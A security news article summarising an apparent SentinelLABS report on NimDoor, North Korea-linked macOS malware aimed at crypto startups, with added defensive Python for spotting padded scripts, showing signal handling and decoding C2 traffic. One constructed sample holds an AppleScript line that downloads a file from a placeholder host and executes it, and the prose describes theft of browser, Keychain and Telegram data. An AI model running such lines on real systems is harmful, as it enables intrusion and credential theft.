
A new wave of North Korean cyberattacks is exploiting macOS systems in Web3 and cryptocurrency startups using a rare and remarkably advanced malware family dubbed NimDoor. According to a detailed analysis from SentinelLABS, the campaign blends social engineering, novel persistence tactics, and unusual use of the Nim programming language—marking an alarming evolution in the DPRK’s playbook for espionage and financial gain.
The attack begins like many DPRK campaigns: with social engineering over Telegram, impersonating a trusted contact to trick the victim into joining a fake Zoom meeting via Calendly. The target receives a message urging them to run a “Zoom SDK update script,” hosted on an attacker-controlled domain masquerading as a Zoom support page.
“Variants of this script can be found in public malware repositories through the seemingly unintentional typo… ‘Zook SDK Update’ instead of ‘Zoom SDK Update’,” SentinelLABS explains.
Hidden within 10,000 lines of whitespace, the final three lines of this AppleScript quietly download and launch a malicious payload from domains like support.us05web-zoom[.]forum.
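The padding trick described above (thousands of blank lines followed by a short download-and-run tail) is easy to spot once you look for it. The following scanner is an added example written for this article, not code from SentinelLABS or from the campaign; the token list, thresholds and the two sample scripts are constructed for illustration, and the URL in the sample is a placeholder rather than an indicator from the report.

```python
# Added example (not from the SentinelLABS report): a heuristic scanner for
# AppleScript/shell files that hide their real commands behind a large run of
# blank lines, as described for the "Zoom SDK update script".

# Tokens that suggest download-and-execute behaviour when they appear in the
# trailing non-blank lines of a padded script. Assumed list, not from the page.
SUSPICIOUS_TOKENS = ("curl", "do shell script", "chmod", "/tmp", "osascript", "nohup")


def analyze_script(text, min_blank_run=500, tail_lines=10):
    """Return padding statistics and a verdict for one script.

    A script is flagged when a single run of at least `min_blank_run` blank
    lines exists AND the last `tail_lines` non-blank lines reference
    download/execute tokens.
    """
    lines = text.splitlines()
    longest_run = 0
    current = 0
    for line in lines:
        if line.strip() == "":
            current += 1
            longest_run = max(longest_run, current)
        else:
            current = 0
    # Only the non-blank lines at the end of the file carry the real payload.
    tail = [l for l in lines if l.strip()][-tail_lines:]
    hits = sorted({tok for tok in SUSPICIOUS_TOKENS for l in tail if tok in l.lower()})
    flagged = longest_run >= min_blank_run and bool(hits)
    return {
        "total_lines": len(lines),
        "longest_blank_run": longest_run,
        "suspicious_tokens": hits,
        "flagged": flagged,
    }


# Constructed samples mimicking the layout described in the article: a comment,
# a large block of whitespace, then a few live lines. Placeholder domain only.
PADDED_SAMPLE = "-- Zoom SDK Update\n" + "\n" * 10000 + (
    'set tmpPath to "/tmp/update"\n'
    'do shell script "curl -s https://example.invalid/update -o " & tmpPath\n'
    'do shell script "chmod +x " & tmpPath & " && " & tmpPath\n'
)
BENIGN_SAMPLE = "-- Zoom SDK Update\n" + "\n" * 3 + 'display dialog "Update complete"\n'


if __name__ == "__main__":
    for name, sample in (("padded", PADDED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, analyze_script(sample))
```

Run it over a directory of `.scpt` sources or downloaded `.sh` files by reading each file into `analyze_script`; the blank-run threshold is deliberately far below the 10,000 lines seen here so that smaller padding variants are still caught, while the token check keeps legitimate scripts with long comment gaps from being flagged.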
Upon execution, two binaries are dropped to /private/var/tmp:
- a – A C++ binary responsible for initial system fingerprinting and injecting shellcode into a benign process.
- installer – A Nim-compiled universal binary that sets up persistence and drops further payloads: GoogIe LLC and CoreKitAgent.
Notably, the use of Nim binaries on macOS is highly uncommon.
“The threat actors deploy AppleScripts widely… and use Nim-compiled binaries containing encrypted configuration handling, asynchronous execution, and a signal-based persistence mechanism previously unseen in macOS malware,” SentinelLABS notes.
In a rare technique for macOS, the malware installs persistence only when terminated. The CoreKitAgent binary sets signal handlers for SIGINT and SIGTERM—signals used to terminate processes—and responds by deploying its persistence components at that moment.
“This behavior ensures that any user-initiated termination of the malware results in the deployment of the core components.”
This is defensive evasion by design: it anticipates that security teams will attempt to kill suspicious processes, and turns that very action into the trigger for installing persistence.
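The signal semantics behind this trick are worth seeing concretely, because they decide how a responder should stop such a process. The script below is an added example, not code from the report or the malware: it installs a handler for SIGTERM, sends the signal to itself, and shows that the handler's code runs; it then shows that SIGKILL (and SIGSTOP) cannot be given a handler at all, which is why a SIGKILL never gives a process the chance to react.

```python
# Added example (not code from the report): why a process that handles
# SIGTERM/SIGINT gets to run code when it is "killed", and why SIGKILL
# cannot be intercepted. Signal numbers 15 (SIGTERM) and 9 (SIGKILL) are
# the same on macOS and Linux.
import os
import signal
import time

_events = []


def _on_terminate(signum, frame):
    # In the malware described above this is where the persistence
    # components would be dropped; here it only records that the handler ran.
    _events.append(signal.Signals(signum).name)


def handled_signal_runs_code(sig=signal.SIGTERM):
    """Install a handler for `sig`, deliver it to our own process and report
    which handlers executed. The previous disposition is restored afterwards."""
    previous = signal.signal(sig, _on_terminate)
    try:
        del _events[:]
        os.kill(os.getpid(), sig)
        # CPython runs Python-level handlers between bytecodes; wait briefly.
        deadline = time.monotonic() + 1.0
        while not _events and time.monotonic() < deadline:
            time.sleep(0.001)
        return list(_events)
    finally:
        signal.signal(sig, previous)


def can_intercept(sig):
    """True if user code may install a handler for `sig`. The kernel rejects
    handlers for SIGKILL and SIGSTOP with EINVAL, so those return False."""
    try:
        previous = signal.signal(sig, signal.SIG_DFL)
    except (OSError, ValueError):
        return False
    signal.signal(sig, previous)
    return True


if __name__ == "__main__":
    print("SIGTERM handler ran:", handled_signal_runs_code(signal.SIGTERM))
    print("SIGTERM interceptable:", can_intercept(signal.SIGTERM))
    print("SIGKILL interceptable:", can_intercept(signal.SIGKILL))
```

The practical consequence for triage: `kill <pid>` (SIGTERM), Ctrl-C (SIGINT) and most "end process" buttons deliver catchable signals that a handler like the one above can act on, whereas `kill -9` delivers SIGKILL, which no handler can observe. Capturing memory and on-disk artifacts before stopping the process remains the safer order regardless of the signal used.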
The core backdoor communicates over WSS (WebSocket Secure) to C2 servers like firstfromsep[.]online, encrypting messages with RC4 and multiple base64 layers. Each victim has a unique Build ID, and commands are issued via JSON objects with encrypted cmd and data fields.
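For analysts who capture WSS traffic from such an implant, the useful skill is peeling the encoding layers back to the JSON command. The decoder below is an added example and not the report's code or the implant's real format: the exact layering (RC4 ciphertext wrapped in two base64 layers, with the cmd and data fields each wrapped once more), the key and the sample message are assumptions constructed for this example, and a real sample's layout must be recovered from the binary. The RC4 routine itself is the standard algorithm.

```python
# Added example, not the report's own code: an analyst-side decoder for a
# C2 message built the way the article describes (RC4 encryption inside
# several base64 layers, carrying a JSON object whose cmd and data fields
# are themselves encrypted). Layout, key and sample are assumptions.
import base64
import json

SAMPLE_KEY = b"example-rc4-key"  # constructed for this example


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def peel_base64(blob: bytes, max_layers: int = 8) -> bytes:
    """Strip nested base64 layers until the content stops being valid base64
    (raw RC4 ciphertext almost always contains bytes outside the alphabet)."""
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        blob = decoded
    return blob


def _wrap(plain: bytes, key: bytes, layers: int) -> bytes:
    """Encrypt then apply `layers` rounds of base64 (used only to build the sample)."""
    blob = rc4(key, plain)
    for _ in range(layers):
        blob = base64.b64encode(blob)
    return blob


def _unwrap(blob: bytes, key: bytes) -> bytes:
    return rc4(key, peel_base64(blob))


def build_sample_message(key: bytes = SAMPLE_KEY) -> bytes:
    """Constructed wire message in the assumed layout (not a real capture)."""
    envelope = {
        "build_id": "BUILD-0001",
        "cmd": _wrap(b"setCwd", key, 1).decode(),
        "data": _wrap(b"/Users/analyst", key, 1).decode(),
    }
    return _wrap(json.dumps(envelope).encode(), key, 2)


def decode_message(wire: bytes, key: bytes) -> dict:
    """Peel the outer layers, parse the JSON envelope, then decrypt cmd/data."""
    envelope = json.loads(_unwrap(wire, key))
    for field in ("cmd", "data"):
        envelope[field] = _unwrap(envelope[field].encode(), key).decode("utf-8", "replace")
    return envelope


if __name__ == "__main__":
    print(decode_message(build_sample_message(), SAMPLE_KEY))
```

When working from a real capture, replace `SAMPLE_KEY` with the key recovered from the binary's encrypted configuration and check the number of layers `peel_base64` actually removed against what the decryption routine in the sample does; an adaptive peel is convenient but a fixed layer count taken from the code is the authoritative answer.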
Supported commands include:
- execCmd – Execute arbitrary shell commands
- getSysInfo – Extract system data
- getCwd / setCwd – File system manipulation
“This kind of process injection technique is rare in macOS malware and requires specific entitlements to be performed.”
Two Bash scripts—upl and tlgrm—handle data theft:
- upl targets data from browsers including Chrome, Firefox, Edge, Brave, and Arc, plus Keychain files and shell histories.
- tlgrm exfiltrates Telegram’s encrypted local database and key blobs for potential decryption.
All data is uploaded to a shared endpoint: https[:]//dataupload[.]store/uploadfiles.
Embedded AppleScripts act as lightweight backdoors, beaconing to C2s like writeup[.]live every 30 seconds and running commands on receipt.
“This simple AppleScript functions both as a beacon and a backdoor… listing all running processes and executing any response received.”
The script is obfuscated using long hex strings and random character lists to evade detection.
This campaign represents one of the most sophisticated DPRK-linked macOS threats observed to date, with a full arsenal of:
- Nim and C++ payloads
- WSS-encrypted C2 comms
- Signal-based persistence
- AppleScript backdoors
- Browser, Keychain, and Telegram data theft
- Anti-debugging and VM evasion
“We refer to this family of malware collectively as NimDoor, based on its functionality and development traits.”
As SentinelLABS warns, this campaign is not just a one-off, but a rehearsed and modular playbook, likely to be reused in future operations targeting macOS users in Web3, crypto, and beyond.